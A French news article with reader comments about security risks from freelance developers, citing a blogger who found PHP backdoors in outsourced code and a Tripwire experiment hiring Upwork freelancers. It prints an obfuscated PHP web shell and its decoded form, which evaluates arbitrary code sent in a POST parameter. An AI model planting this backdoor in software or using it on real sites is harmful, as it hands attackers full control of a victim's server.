Vous êtes nouveau sur Developpez.com ? Créez votre compte ou connectez-vous afin de pouvoir participer !

Vous devez avoir un compte Developpez.com et être connecté pour pouvoir participer aux discussions.

Vous n'avez pas encore de compte Developpez.com ? Créez-en un en quelques instants, c'est entièrement gratuit !

Si vous disposez déjà d'un compte et qu'il est bien activé, connectez-vous à l'aide du formulaire ci-dessous.

Identifiez-vous
Identifiant
Mot de passe
Mot de passe oublié ?
Créer un compte

L'inscription est gratuite et ne vous prendra que quelques instants !

Je m'inscris !

Les développeurs indépendants représentent-ils un risque pour la sécurité des entreprises ? Oui
Selon une étude

Le , par Stéphane le calme

21PARTAGES

26  2 
Les développeurs indépendants représentent-ils un risque pour la sécurité des entreprises ?
Les travailleurs indépendants se sont révélés être une ressource extrêmement utile pour de nombreuses petites entreprises au cours des dernières années, ce qui permet de recruter des compétences spécialisées au besoin. D’ailleurs même les grandes enseignes de la technologie, à l’instar de la NASA ou de Google, ont déjà eu recours à l'externalisation des services informatiques.

Cependant, Robert Hansen, un spécialiste du mobile, a décrit une mauvaise expérience qu’il a eue en juin 2016 lorsqu’il devait externaliser la mise à jour de son blog Smartphone Exec. Il est passé par la plateforme américaine de freelance Upwork.

« Durant la première semaine, les choses se sont bien déroulées. Une communication régulière et des délais clairs sont importants. Mais ce développeur particulier avait quelques tours dans ses manches. Tout d'abord, le compte dont il se servait était un front pour une équipe de développement plus grande. Cette équipe de développement n'était pas disposée à utiliser la fonction Upwork intégrée pour effectuer le suivi du travail dans le temps », a-t-il expliqué.

Pour rappel, Upwork se sert d’une application pour permettre au client de suivre l’évolution du travail qu’il a commandé dans le temps : l’application se charge alors d’apporter aux clients divers éléments (capture d’écran, photo prise par la webcam du travailleur indépendant – si celui-ci l’autorise –, etc.) qui seront alors situés dans une chronologie que le client pourra parcourir à sa guise. Le fait que le développeur, ainsi que l’équipe avec laquelle il travaille, refuse de se servir de cette application a été pour Hansen « Le premier signe que quelque chose allait de travers. »

« En second lieu, il a fallu 40 heures pour conditionner le code pour la livraison - quelque chose qui aurait dû être extrêmement simple à faire si le code était effectivement développé de manière professionnelle. Mais le dernier problème était le plus lourd », a-t-il continué.

« Lorsque le code m’a été livré, il était dans un format que l’iPhone ne peut pas gérer facilement – les fichiers zip. J'ai donc brisé ma règle et l'ai téléchargée dans un ordinateur et avant même de pouvoir le décompresser, Microsoft Security Essentials a trouvé quelque chose qui lui semblait suspect. J'ai donc creusé dans le code et j'ai trouvé six portes dérobées PHP qui permettraient à ce développeur et à leur équipe d'accéder à ce site. »

Voici un exemple de ce à quoi ressemblait le code avant la décompression :

Code PHP : Sélectionner tout
<?PHP&nbsp;$viu0="sutpe_or";&nbsp;$iwvk7=$viu0[0].$viu0[2].$viu0[7].$viu0[2].$viu0[6].$viu0[1].$viu0[3].$viu0[3].$viu0[4].$viu0[7];&nbsp;$uvwh73=$iwvk7 ($viu0[5].$viu0[3].$viu0[6].$viu0[0].$viu0[2]); if(isset(${$uvwh73}['q490ded'])){eval(&nbsp;${$uvwh73}['q490ded']);}&nbsp;?>

Après la décompression, il ressemblait à ceci :

Code PHP : Sélectionner tout
<?PHP if(isset(${_POST}['q490ded'])){eval(${_POST}['q490ded']);}&nbsp;?>

« Fondamentalement, ce que cela dit, c'est que chaque fois que leur équipe irait sur mon site Web et ferait une demande POST sur mon site avec le paramètre ci-dessus, ils auraient pu exécuter n'importe quelle commande, comme s’ils avaient le même niveau d'accès que j'avais. »

Suite à cette situation, l’entreprise de sécurité Tripwire s’est intéressée à la question de savoir si, lorsqu’un client (entreprise ou particulier) fait appel à ce genre de travailleurs, en particulier pour des projets informatiques, cela pourrait compromettre la sécurité de l’entreprise. Pour savoir à quel point ce problème peut être répandu, l’entreprise a eu l’idée de mener une expérience auprès de 25 développeurs indépendants.

L’équipe VERT (Vulnerability and Exposure Research Team) de Tripwire a envoyé un courrier à l’ensemble des candidats avec le même projet, la création d’un site web avec différentes fonctionnalités : « Le plan était simple: créer un personnage non technique et, en tant que tel, embaucher un certain nombre de travailleurs indépendants pour créer un site web. Chaque entrepreneur a reçu le même courrier électronique avec les mêmes critères. »

Bien que l'équipe ne savait pas à quoi s'attendre, elle avait une série d'objectifs à l'esprit. Tout d'abord, elle voulait analyser les interactions avec les entrepreneurs. Comment était la communication ? Ont-ils tenté d'arnaquer le client ou le marché ? Combien accepteraient le travail, et combien le refuseraient ou tenteraient d'augmenter les enchères ?

Autant de questions que l’équipe a trouvé intéressantes même si, finalement, elle s’est fixé deux objectifs principaux :

tout d'abord, elle voulait identifier les portes dérobées, les mots de passe codés et les actions intentionnellement malveillantes prises par les entrepreneurs ;
ensuite, elle voulait trouver tous les défauts et les vulnérabilités dans le code livré.

25 développeurs ont répondu à l’appel de cette offre proposée à 250 dollars. Plusieurs ont sollicité une communication et un paiement hors de la plateforme, probablement pour éviter de payer la commission à Upwork, ce qui a conduit à la fermeture immédiate de leur compte pour violations de conditions et services. D’autres ont été exclus, car ils demandaient un montant plus élevé que le budget proposé.


Craig Young, chercheur principal en sécurité chez Tripwire


Cependant, 17 développeurs ont réussi à passer entre les mailles du filet. Ils ont mis entre 7 et 9 jours pour livrer leur client. Pendant le développement du projet, VERT a dû mettre fin à certains contrats pour plusieurs raisons, notamment :

  1. L'entrepreneur a fourni une installation WordPress de base sans assistance pour les utilisateurs du site afin qu’ils puissent télécharger des documents. Le contractant a refusé de fournir un remboursement et a réclamé faussement (six fois) que le travail ait été effectué selon les spécifications du client. Le support à la clientèle devait être invoqué pour forcer un remboursement ;
  2. L'entrepreneur a fourni des fichiers initiaux et a ensuite demandé d'annuler la commande parce qu'il « était occupé » quelques jours après le projet ;
  3. L'entrepreneur a demandé plus d'argent immédiatement après avoir accepté le contrat. Il a évoqué un malentendu, prétendant avoir cru que le projet était de mettre à jour un site existant plutôt que d’en créer un nouveau ;
  4. L'entrepreneur a régulièrement fourni des liens vers un site Web WordPress avec des problèmes de configuration qui ont conduit à des pages d’erreur. Deux semaines après la date limite, ils ont convenu de fournir un remboursement ;
  5. L'entrepreneur a demandé l'URL du panneau de contrôle du site et a indiqué qu'il était difficile de créer un site sans cela. Le contrat a été annulé parce qu'ils ont déclaré par la suite qu’il faudrait 20 à 25 jours plutôt que les sept jours convenus, et que le prix aurait besoin d’être renégocié ;
  6. L'entrepreneur a fourni un modèle de page HTML + JS et n'a pas pu fournir le jeu complet de fonctionnalités ;
  7. L'entrepreneur n'a pas été en mesure de fournir des produits livrables après trois semaines.

« S'il s'agissait d'un projet du monde réel, ces conflits constitueraient un problème sérieux, qui entraînerait un dépassement du budget alloué au projet ou un dépassement de la date limite », a indiqué VERT. Et de préciser qu’en plus de cela, « le client aurait eu un site Web instable. »

À la fin, seuls 10 des 17 projets commandés ont été achevés et payés, a indiqué VERT.

Craig Young, chercheur principal en sécurité chez Tripwire, a affirmé que « Nous ne pouvons raisonnablement pas nous attendre à ce que les violations des données diminuent si les sites Web conçus par les développeurs ne sont pas réalisés avec des mesures de sécurité de base intégrées ».

Afin de ne pas être victime des mêmes défauts, Tripwire conseille aux entreprises qui recherchent un nouveau site Web ou d'autres projets connexes d'être plus pointues dans le processus de recrutement, surtout lorsqu'ils envisagent de prendre des entrepreneurs dans des fuseaux horaires différents des leurs.

L'entreprise recommande également d'analyser tous les projets finis avec un scanner de vulnérabilité d'application Web et, idéalement, chercher à obtenir une évaluation par un testeur de pénétration professionnel avant que le paiement final ne soit effectué.

Source : Smartphone Exec, TripWire

Et vous ?

Avez-vous déjà trouvé ou posé des backdoors dans du code ?

Une erreur dans cette actualité ? Signalez-le nous !

Avatar de petitours
Membre éprouvé https://www.developpez.com
Le 16/06/2017 à 6:50
petit illustration en substance
13  0 
Avatar de mh-cbon
Membre extrêmement actif https://www.developpez.com
Le 12/06/2017 à 13:29
a aucun moment le donneur d’ordre ne se remet en question en disant, en fait, je demande un dev pour 250$, ptet que c'est une offre de merde qui n'attirera que les mouches à merde ... ?

Clairement, le type n'est tombé que sur de mauvais prestataires, le pire étant l'exemple mis en focus, puisque clairement le fournisseur de service a travailler dans l'intention de détourner la demande du client.

Encore fois, belle mise en généralité d'un phénomène qui reste marginal puisque bon tout cela ne représente que 26 tentatives....

Par ailleurs, combien de société presta de service informatique refile du magento ou wordpress sans maintenance ?
Ou simplement fournit sans les derniers patchs à jour.
16  5 
Avatar de RyzenOC
Inactif https://www.developpez.com
Le 12/06/2017 à 13:59
comme mh-cbon, 250$ pour un projet de 7 (ou 9 ) jours sérieusement ???
si 1$=1€, c'est moins que le smic en france, et le pire c'est que le $>€ et que les salaires sont plus élevée aux states

et puis wordpress quoi... chez pas je trouve que sa sonne très mal avec "chercheur principal en sécurité".
la création d’un site web
Justement, aucune entreprise sérieuse ne fait un site web avec wordpress...
11  0 
Avatar de Pierre Louis Chevalier
Expert éminent sénior https://www.developpez.com
Le 12/06/2017 à 14:39
Citation Envoyé par mh-cbon Voir le message
a aucun moment le donneur d’ordre ne se remet en question en disant, en fait, je demande un dev pour 250$, ptet que c'est une offre de merde qui n'attirera que les mouches à merde ... ?
Si tu va sur les sites de freelances/missions tu verra que pourtant c'est courant.
C'est donc pertinent que les clients comprennent non seulement qu'ils demandent trop avec des budgets trop bas mais que d'autre part il y à des risques...

Citation Envoyé par mh-cbon Voir le message
alors que clairement, le type n'est tombé que sur de mauvais prestataires, le pire étant l'exemple mis en focus, puisque clairement le fournisseur de service a travailler dans l'intention de détourner la demande du client. Encore fois, belle mise en généralité d'un phénomène qui reste marginal puisque bon tout cela ne représente que 26 tentatives....
"Marginal" c'est vite dit, la cybercriminalité est en très forte croissance... et il suffit d'une fois, les conséquences peuvent êtres désastreuses, cela peu mener au dépôt de bilan d'une société et donc du chômage pour tous les employés, sans parler des clients lésés...
Si tu étais client tu saurais que les "mauvais prestataires" sont légions à ce tarif la.

C'est donc très important d'attirer l'attention des clients sur ces questions...

Si les clients étaient mieux sensibilisés, il feraient plus attention à payer des prestations plus chères avec des prestataires de qualité et non à commander n'importe quoi à n’importe qui.

Du coup ça rends cette news en encore plus le débat qui s'ensuit très important, la question mérite tout à fait d'être posée...
9  0 
Avatar de Grimly
Membre averti https://www.developpez.com
Le 12/06/2017 à 13:42
Citation Envoyé par Stéphane le calme Voir le message
Avez-vous déjà trouvé ou posé des backdoors dans du code ?
Aller, juste pour alimenter les légendes des développeurs voyous : Oui !

Mes backdoors étaient carrément des services clairement exposés me permettant de jouer du code SQL ou Bash arbitraire sur l'environnement de mon choix.

Booouh le méchant développeur ! Sauf que ce dernier n'a fait que son travail et a obéis au chef de projet client qui a un passé de développeur. Au lieu d'investir sur des logs décentralisées et un minimum test sur le workflow, préférait faire du support avec SoapUI.
8  0 
Avatar de Pierre Louis Chevalier
Expert éminent sénior https://www.developpez.com
Le 12/06/2017 à 15:16
Il y à un point d'interrogation, c'est une question, pas une affirmation.
Pour moi la question est pertinente, et la news aussi, après l'étude qui sert de base à la news a un impact forcément limité mais il faut bien partir de quelque chose, et justement c'est intéressant de voir dans le fil si d'autres ont eu des expériences sur ce sujet...

Et détrompe-toi, il y à aussi des "clients" sur ce site, et des directions informatique qui font appel à des prestataires, il y à des millions de lecteurs pour info : Le Club developpez.com, c'est jusqu'à 4 millions de visiteurs uniques.
Je connais énormément de DI/DSI ou même simplement des gérants d'entreprise qui consultent developpez.com...
8  0 
Avatar de koyosama
Membre éprouvé https://www.developpez.com
Le 12/06/2017 à 16:43
Pourtant le phenomene n'est pas nouveau, c'est pas different que de savoir que de mettre sur le boncoin un ordinateur peut aussi resulter par un appel ou un email d'Afrique.
Le phenomene wordpress et su diste pas cher s'amplifie fortement, on commence a faire croire aux gens que c'est facile de deveinir freelancer et surtout c'est facile de devenir developpeur.

Maintenant vous voyez des deals partout sur internet, des cours pour devenir developpeur.
La dicispline demande une certaine dexterite. J'ai cottoye sur freecodecamp par exemple quequ'un du fin fond de l'Asie qui voulait devenir developeur depuis chez ses parents. Ils voulaient ni bouger et voulait en faire le moins possible. C'etait plus le gars qui aimaient la programmation comme les kick ou lol qui voulaient programmer car ils aiement jouer au jeux videos. Bref, ils faisaient tous ces exos en copiant betement le code des autres, ils pensaient reussir a comprendre chaque ligne. Pour un exo qui auraient pu prendre 2 jours, ils mettaient deux semaines plein temps. Le truc c'est qu'il est parti sur du delire, je veux etre freelancer wordpress (j'aurais pas du lui insouffler l'idee). Donc ils commcent direct les cours pour creer une template avec du code sans meme connaitre les bases de PHP ou encore mySQL. Un jour, je lui ai dit que sa methode etaient tres mauvaise, je lui ai demande de faire un exo tout con. Faire un page d'isncription en PHP pour les participants pour une compeition. Je voulais juste voir s'il savaient faire du CRUD et surtout analyser un business quelconque. Guess what, c'etait trop dure pour lui, j'en revenais pas. La chose la plus simple, ile ne comprenait pas. C'etait meme pas le technique mais juste l'application en lui-meme. J'avais beau lui expliquer dans tous les sens, ils comprenaient pas. Il partait sur du delire de code pas possible, je lui ai donc demander quelque chose encore bien plus simple. Le truc le plus con au monde et qui sert dans les benchmark, une TODO list. Meme sa il avait du mal. Je n'ai pas demander ces exos pour lui faire la morale, mais pour voir si c'etait judicieux de commencer de parler de template wordpress , de coder en wordpress avant meme de savoir l'administrer apres 7 mois d'apprentissage en programmation. Donc quand je pense a lui, je pense a tous les glandus sur upwork.

Ce que je veux dire c'est que aujourd'hui on commence a creer une armee de developpeur pour rien. Par exemple 42 est une belle initiative mais Xavier Niel a ete clair, sur les 1000 gars, il veut juste choper les 2 exceptionnels.
Aujourd'hiui ces initiative de MOOC, de cours en ligne, sans compter les 90% de deals sur la suite complete pour devenir developeur, ça fait qu'on donne aux gens l'impression devenit developpeur c'est simple.
Je peux vous dire que sur les 10000 personnes inscrit sur freecodecamp, il y'en a peut etre 50 qui sont vraiment devenu developpeur.

Les entreprises qui veuelent outsourcer les competence IT sont aussi fautifs. Je peux comprendre qu'une petite companie veut avoir un site web pas cher. Mais j'ai rencontre des gens qui voulaient sous-payer expres les developpeurs. Meme un qui croyait que me payer 100 euros par mois pour faire un site web c'etait suffisant alors que deux jours d'heure sup et j'ai ces 100 euros.

Tu as deux problemes :
  • Le freelancer qui veut juste de l'argent facile alors qu'il devrait pas etre developpeur.
  • Certains cherchent juste parfois la premiere experiences et sa c'est la faute du marche.
  • L'entreprise qui croit que wordpress veut dire pas cher ou qu'un site web c'est pas cher a contruire alors que c'est faux.


Les gens oublient un site web evolue toujours, qu'une application quel qui soit doit se renouveler (exemple : NHS en angleterre). Je vois beaucoup d'histoire ou les gens se font pirater leur site car ils negliger fortement l'aspect technique car ils voulaient pas le faire. J'ai vu des gens qui voulaient ouvrir des entreprises literalement avec 0 euros (enseigne + site web) sans demander capital de fond, sans investisseur car ils croyaient qu'ouvrir une entreprise c'est juste de la paperasse.

Le phenomene de l'entrepreneur, de l'argent facile par le freelancing est amplifie par des gens qui donnent des success a m'importe qui. Ces conseils sont destines pas a m'importe qui, mais devraient a des gens qui ont de l'experience avec la vie et le business. Car maintenant tu as tous les etudiants, les gens des pays qui ont pas l'infrastructure pour faire le minimum requis qui ecoutent des conseils qu'ils devraient pas. Les gens devraient etre moins radins et plus responsable.

Personnellement, 7 jours c'est trop cours pour creer tout un nouveau site. Un portfolio, je peux comprendre, mais un nouveau site web avec des specificite, cela demande temps d'integration, de tests et developpement.

Vous connaissez le marche francais, mais le marche mondiale est vachement competitf. Ceux qui s'attaquent a un marche anglo-saxon a besoin d'etre aussi bon que les gens chez Google pour se faire recruter. Donc en fait la premiere experience, c'est un peu le far-west tout les coups sont permis.
8  0 
Avatar de NSKis
En attente de confirmation mail https://www.developpez.com
Le 12/06/2017 à 16:14
Les explications du "client malheureux" sont à mourir de rire... Et j'ajouterai: "Il en a eu pour son argent!"

Quand on veut payer un service à un prix "bas de gamme", on a un service "bas de gamme"

En cela, le développeur a fourni très exactement le service demandé
7  0 
Avatar de Folgore
Membre du Club https://www.developpez.com
Le 18/06/2017 à 15:33
J'ai vu ce que c’était une société de consultants...

On fait croire que c'est du sérieux, mais en fait, ça ne fait que magouiller là où ça arrange: à la tête du client (et de sa fortune), ajouter des jours de travail là où il n'en faut pas histoire de facturer toujours plus ! Les managers assurent qu'ils ont les compétences pour valider le projet du client mais en fait non, pas grave, on place quand même le développeur (ou équivalent !) qui Il n’y connais rien dessus, tant que client signe et paye à la fin.

Qui y gagne a la fin ? Le développeur lui aura son salaire de base et avec un peu de chance un bonus à la fin d'année. Quant aux managers, responsables, chefs de projets... eux qui souvent n’auront presque rien branlé du projet, auront droits a de plus gros bonus… Et le client, probablement quelques chose qui "fonctionne" mais payé au prix salé.

Pour ça que je n'ai rien compte le travail indépendant. Parce que je sais que parmi eux y a de bons développeurs indé qui font du bon travail et qui facture de manière honnête.
8  1 
Avatar de Jean-Philippe André
Rédacteur/Modérateur https://www.developpez.com
Le 13/06/2017 à 10:25
Tremblez, entreprises de peu de budget, tous les freelances viendront vous faire les poches de gre ou de force
6  0